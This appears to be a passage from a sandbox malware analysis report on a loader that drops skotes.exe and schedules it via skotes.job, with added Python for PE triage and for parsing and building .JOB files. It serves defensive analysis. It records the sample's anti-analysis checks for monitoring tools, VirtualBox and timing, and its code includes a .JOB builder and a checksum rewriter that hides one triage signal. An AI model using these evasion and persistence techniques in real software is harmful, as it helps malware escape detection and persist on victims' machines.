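    """Rewrite the CheckSum field so that triage() reports it as consistent."""
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    off = e_lfanew + 24 + 64
    out = bytearray(data)
    struct.pack_into("<I", out, off, pe_checksum(data, off))
    return bytes(out)


def build_sample_pe() -> bytes:
    """Constructed PE32 (not file.exe): a flat .text, a high-entropy section named
    hockpqtz, the entry point inside .taggant, and the stale checksum the report quotes."""
    packed, block = b"", hashlib.sha256(b"seed").digest()
    while len(packed) < 0x4000:                           # deterministic pseudo-random bytes
        block = hashlib.sha256(block).digest()
        packed += block
    bodies = [(b".text", b"\x90" * 0x200), (b"hockpqtz", packed), (b".taggant", b"\xCC" * 0x200)]
    hdr = bytearray(0x200)                                # SizeOfHeaders / FileAlignment 0x200
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)               # e_lfanew
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", hdr, 0x44, 0x14C, len(bodies), 0, 0, 0, 224, 0x102)
    opt = 0x44 + 20
    struct.pack_into("<H", hdr, opt, 0x10B)               # PE32 magic
    struct.pack_into("<I", hdr, opt + 16, 0x6010)         # AddressOfEntryPoint, inside .taggant
    struct.pack_into("<I", hdr, opt + 64, 0x1DBB1F)       # stale CheckSum, value from the report
    raw, va, blob = 0x200, 0x1000, b""
    for i, (name, body) in enumerate(bodies):
        struct.pack_into("<8sIIIIIIHHI", hdr, opt + 224 + 40 * i, name, len(body), va,
                         len(body), raw, 0, 0, 0, 0, 0xE0000020)
        raw += len(body)
        va += (len(body) + 0xFFF) & ~0xFFF                # SectionAlignment 0x1000
        blob += body
    return bytes(hdr) + blob
```

On a real file, `triage(open(path, "rb").read())` gives the same four signals the report lists; a checksum mismatch alone is weak (most unsigned builds never set the field), but together with an entry point in an unnamed or oddly named section and entropy above 7.9 it is the signature of a packed stub, which is exactly why the section is reported as unpacking at run time.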

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
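The persistence artifact here is C:\Windows\Tasks\skotes.job, a Task Scheduler 1.0 job file written through the legacy ITaskScheduler interface (mstask.dll, which the section-loaded list above shows inside file.exe). These files are plain binary structures and can be triaged straight from a disk image without the scheduler service. The following Python is an added example, not part of the report: it parses and builds .JOB files following the field layout in MS-TSCH section 2.4 (the 68-byte FIXDLEN_DATA header, length-prefixed UTF-16LE strings, and 48-byte trigger records). The page does not show the contents of skotes.job, so the job assembled here uses constructed trigger values and only reuses the dropped file's path.

```python
"""Parse and build Task Scheduler 1.0 .JOB files (C:\\Windows\\Tasks\\*.job).
Added example, not part of the report; layout per MS-TSCH 2.4."""
import struct
import uuid

FIXDLEN = struct.Struct("<HH16sHHHHHHIIIII16s")   # 68-byte fixed-length header
TRIGGER = struct.Struct("<HHHHHHHHHHIIIIHHHHHH")  # 48-byte trigger record
TRIGGER_TYPES = {0: "ONCE", 1: "DAILY", 2: "WEEKLY", 3: "MONTHLYDATE", 4: "MONTHLYDOW",
                 5: "ON_IDLE", 6: "AT_SYSTEMSTART", 7: "AT_LOGON"}


def _unicode(buf: bytes, off: int):
    """Length-prefixed UTF-16LE string; the length counts characters incl. the NUL."""
    n, = struct.unpack_from("<H", buf, off)
    off += 2
    if n == 0:
        return "", off
    return buf[off:off + 2 * n].decode("utf-16-le").rstrip("\0"), off + 2 * n


def _pack_unicode(s: str) -> bytes:
    if not s:
        return struct.pack("<H", 0)
    raw = (s + "\0").encode("utf-16-le")
    return struct.pack("<H", len(raw) // 2) + raw


def parse_job(buf: bytes) -> dict:
    """Decode the header, the string block and every trigger of a .JOB file."""
    f = FIXDLEN.unpack_from(buf, 0)
    out = {"product_version": f[0], "file_version": f[1],
           "uuid": str(uuid.UUID(bytes_le=f[2])), "app_name_offset": f[3],
           "trigger_offset": f[4], "priority": f[9], "max_run_time_ms": f[10],
           "exit_code": f[11], "status": f[12], "flags": f[13],
           "last_run": struct.unpack("<8H", f[14])}        # SYSTEMTIME, all zero if never run
    off = FIXDLEN.size
    out["running_instances"], = struct.unpack_from("<H", buf, off)
    off += 2
    assert off == f[3], "App Name Len Offset does not point at the application name"
    for key in ("application", "parameters", "working_directory", "author", "comment"):
        out[key], off = _unicode(buf, off)
    for key in ("user_data", "reserved_data"):
        n, = struct.unpack_from("<H", buf, off)
        off += 2
        out[key] = buf[off:off + n]
        off += n
    assert off == f[4], "Trigger Offset does not point at the trigger list"
    count, = struct.unpack_from("<H", buf, off)
    off += 2
    out["triggers"] = []
    for _ in range(count):
        t = TRIGGER.unpack_from(buf, off)
        off += TRIGGER.size
        out["triggers"].append({"type": TRIGGER_TYPES.get(t[13], t[13]),
                                "begin": (t[2], t[3], t[4]), "start": (t[8], t[9]),
                                "minutes_duration": t[10], "minutes_interval": t[11],
                                "flags": t[12]})
    return out


def is_suspicious(job: dict) -> bool:
    """Heuristic a triage script would apply: scheduled binary living under a
    user temp directory, as the dropped skotes.exe does."""
    app = job["application"].lower()
    return "\\appdata\\local\\temp\\" in app or app.endswith(".exe") and "\\temp\\" in app


def build_job(application: str, parameters: str = "", working_directory: str = "",
              author: str = "", comment: str = "", triggers=()) -> bytes:
    """Assemble a .JOB file; triggers are tuples
    (type, (year, month, day), (hour, minute), minutes_interval, minutes_duration)."""
    body = struct.pack("<H", 0)                          # running instance count
    app_offset = FIXDLEN.size + len(body)
    for s in (application, parameters, working_directory, author, comment):
        body += _pack_unicode(s)
    body += struct.pack("<H", 0)                         # user data: none
    body += struct.pack("<H", 8) + b"\0" * 8             # reserved data (TASKRESERVED1)
    trigger_offset = FIXDLEN.size + len(body)
    body += struct.pack("<H", len(triggers))
    for ttype, (y, m, d), (hh, mm), interval, duration in triggers:
        body += TRIGGER.pack(TRIGGER.size, 0, y, m, d, 0, 0, 0, hh, mm, duration, interval,
                             0, ttype, 1 if ttype == 1 else 0, 0, 0, 0, 0, 0)
    header = FIXDLEN.pack(0x0500, 1, uuid.uuid4().bytes_le, app_offset, trigger_offset,
                          0, 0, 0, 0, 0x20, 72 * 60 * 60 * 1000, 0, 0, 0, b"\0" * 16)
    return header + body
```

Run `parse_job(open(r"C:\Windows\Tasks\skotes.job", "rb").read())` on the collected file to recover the scheduled command line, author and trigger cadence; a DAILY trigger with a one-minute repeat interval on a binary under AppData\Local\Temp is the shape a loader uses to make sure its payload is restarted after reboot or after the process is killed.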

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6E5C87 second address: 6E5CA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD0F8E1A7B7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6E5CA8 second address: 6E5CDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edx 0x00000006 pop edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007FD0F8CDABF9h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007FD0F8CDABF0h 0x00000019 jmp 00007FD0F8CDABEAh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6CBEF1 second address: 6CBF00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD0F8E1A7A6h 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6E4C19 second address: 6E4C1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6E4DA1 second address: 6E4DA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6E4DA5 second address: 6E4DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6E4DAB second address: 6E4DCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7ACh 0x00000009 jmp 00007FD0F8E1A7B4h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6E4F5E second address: 6E4F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6E520A second address: 6E5227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jns 00007FD0F8E1A7A6h 0x0000000c popad 0x0000000d jmp 00007FD0F8E1A7ADh 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6E9456 second address: 6E94CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FD0F8CDABECh 0x0000000f popad 0x00000010 add dword ptr [esp], 0F2EE646h 0x00000017 jnl 00007FD0F8CDABF2h 0x0000001d jmp 00007FD0F8CDABECh 0x00000022 push 00000003h 0x00000024 xor edx, dword ptr [ebp+122D2DCCh] 0x0000002a push 00000000h 0x0000002c mov edi, dword ptr [ebp+122D29F3h] 0x00000032 push 00000003h 0x00000034 mov edi, dword ptr [ebp+122D215Eh] 0x0000003a push B0800926h 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FD0F8CDABF2h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6E9599 second address: 6E9648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0F8E1A7B8h 0x00000009 popad 0x0000000a add dword ptr [esp], 06A0303Ch 0x00000011 mov edi, dword ptr [ebp+122D2C23h] 0x00000017 push 00000003h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007FD0F8E1A7A8h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 jmp 00007FD0F8E1A7B9h 0x00000038 push 00000000h 0x0000003a sub ecx, dword ptr [ebp+122D2A4Fh] 0x00000040 push edx 0x00000041 mov cx, bx 0x00000044 pop edi 0x00000045 push 00000003h 0x00000047 mov edx, dword ptr [ebp+122D2A2Fh] 0x0000004d jmp 00007FD0F8E1A7B9h 0x00000052 call 00007FD0F8E1A7A9h 0x00000057 push edi 0x00000058 push ecx 0x00000059 jmp 00007FD0F8E1A7ADh 0x0000005e pop ecx 0x0000005f pop edi 0x00000060 push eax 0x00000061 pushad 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6E9648 second address: 6E9665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD0F8CDABF4h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6E9665 second address: 6E96AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jp 00007FD0F8E1A7BFh 0x00000014 jmp 00007FD0F8E1A7B9h 0x00000019 mov eax, dword ptr [eax] 0x0000001b jne 00007FD0F8E1A7AAh 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push edx 0x00000028 push edx 0x00000029 pop edx 0x0000002a pop edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6E96AE second address: 6E96DA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD0F8CDABE8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d mov ch, dh 0x0000000f mov esi, dword ptr [ebp+122D2CA3h] 0x00000015 lea ebx, dword ptr [ebp+1245E2E3h] 0x0000001b mov dword ptr [ebp+122D2253h], eax 0x00000021 or dword ptr [ebp+122D17D3h], eax 0x00000027 push eax 0x00000028 push eax 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6E974E second address: 6E9752 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6E9752 second address: 6E9798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 or dword ptr [ebp+122D2DDCh], edi 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007FD0F8CDABE8h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 and ecx, dword ptr [ebp+122D2B6Bh] 0x0000002f push 91B8962Bh 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 jmp 00007FD0F8CDABEBh 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6E9798 second address: 6E979D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6E979D second address: 6E9808 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 6E476A55h 0x00000010 mov dword ptr [ebp+122D2DCCh], edx 0x00000016 push 00000003h 0x00000018 mov edi, 009CFDF6h 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007FD0F8CDABF9h 0x00000025 pop edx 0x00000026 pop ecx 0x00000027 push 00000003h 0x00000029 mov edi, dword ptr [ebp+122D2C47h] 0x0000002f push A3ED00D1h 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FD0F8CDABF3h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6E9808 second address: 6E980E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FAE79 second address: 6FAE7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 707086 second address: 70708B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 70708B second address: 707091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 707091 second address: 70709A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 70709A second address: 7070A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD0F8CDABE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7070A4 second address: 7070A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 707350 second address: 70735D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007FD0F8CDABE8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 70735D second address: 707369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FD0F8E1A7A6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 707369 second address: 707386 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 707386 second address: 707390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 707390 second address: 70739A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD0F8CDABE6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70739A second address: 7073B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7073B4 second address: 7073E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FD0F8CDABEAh 0x00000012 pop eax 0x00000013 ja 00007FD0F8CDABF9h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7073E5 second address: 70740C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7B8h 0x00000009 jmp 00007FD0F8E1A7ABh 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707ED6 second address: 707EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jg 00007FD0F8CDABE6h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707EE9 second address: 707EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707EED second address: 707F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 ja 00007FD0F8CDAC15h 0x0000000d jnc 00007FD0F8CDAC01h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 700043 second address: 700059 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7B2h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 700059 second address: 700074 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 jno 00007FD0F8CDABE6h 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jl 00007FD0F8CDABF0h 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CD9C0 second address: 6CD9C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708729 second address: 70873D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 ja 00007FD0F8CDABE6h 0x0000000c jno 00007FD0F8CDABE6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70873D second address: 70874A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70874A second address: 708750 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708750 second address: 708760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FD0F8E1A7AEh 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708760 second address: 70876E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007FD0F8CDABE6h 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70876E second address: 708772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708A49 second address: 708A4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708A4F second address: 708A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708CFB second address: 708CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708CFF second address: 708D15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FD0F8E1A7A6h 0x0000000d jnc 00007FD0F8E1A7A6h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70CBF9 second address: 70CBFF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70CBFF second address: 70CC25 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD0F8E1A7ACh 0x00000008 jl 00007FD0F8E1A7A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD0F8E1A7B1h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70CC25 second address: 70CC2F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD0F8CDABE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70DCC8 second address: 70DCDB instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD0F8E1A7A6h 0x00000008 je 00007FD0F8E1A7A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
